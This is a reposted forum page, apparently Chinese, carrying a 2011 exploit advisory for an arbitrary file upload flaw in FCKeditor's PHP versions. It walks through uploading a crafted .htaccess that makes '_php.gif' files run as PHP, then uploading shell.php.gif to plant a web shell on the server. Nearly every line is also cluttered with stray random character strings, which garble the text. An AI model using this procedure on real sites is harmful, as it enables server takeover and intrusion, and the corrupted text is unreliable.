FCKeditor所有php版本Upload上传漏洞
& A$ x3 d+ h4 T6 Q作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:070 w, s2 y( D: ~! |1 ~
减小字体 增大字体
, R7 J. I, n9 y+ c0 m, z$ \[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability- G7 I/ t% H4 C, `" j5 X
[+] Date: 2011
! R4 y) u8 E( v8 j, b[+] Author : sinesafe.cn' K+ n2 h9 f! i" P+ b( l4 ?. @
[+] Website : WwW.sinesafe.cn+ Z6 X& b: j$ Y4 L
———————————————————4 A! f' o# M( E8 ]; F* B
1.create a htaccess file:/ O* [, I! N% p& Q N$ ^! O
code:
- K5 ^; d6 d: c8 n<FilesMatch “_php.gif”>; Z! ]1 G0 [) ~ I
SetHandler application/x-httpd-php5 ^$ z8 o3 r6 R
</FilesMatch>
- j$ `2 J8 Z( y9 r# U
. a6 f5 R! z$ ~4 m! u2.Now upload this htaccess with FCKeditor.8 h$ r! Y/ J. b/ Q* ]
/ _; B* |: L$ {$ L) h
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
/ I$ b: }; a3 {0 y4 G6 h6 T& K5 |" l9 }) `
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
6 T$ T9 f: K$ x' O& h" J4 W9 l2 R% j
' S9 B5 R+ W6 h+ T: q, Y$ E———————————————————————————————-
0 S( [+ [5 }/ w. q! g3.Now upload shell.php.gif with FCKeditor.' \' }( K8 u6 a( y$ s
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.1 |: m9 E! _- E4 U! }) s! C
5.http://www.sinesafe.cn/anything/shell_php.gif
, Y9 P; \: ^ }6.Now shell is available from server. |
) T! F2 w( @8 A4 e" H0 O& y5 Q
8 y+ `6 W: U* [' p
9 p& j( \( ]( Q3 Q |
发表于 2013-10-27 17:25:21
收藏
支持
反对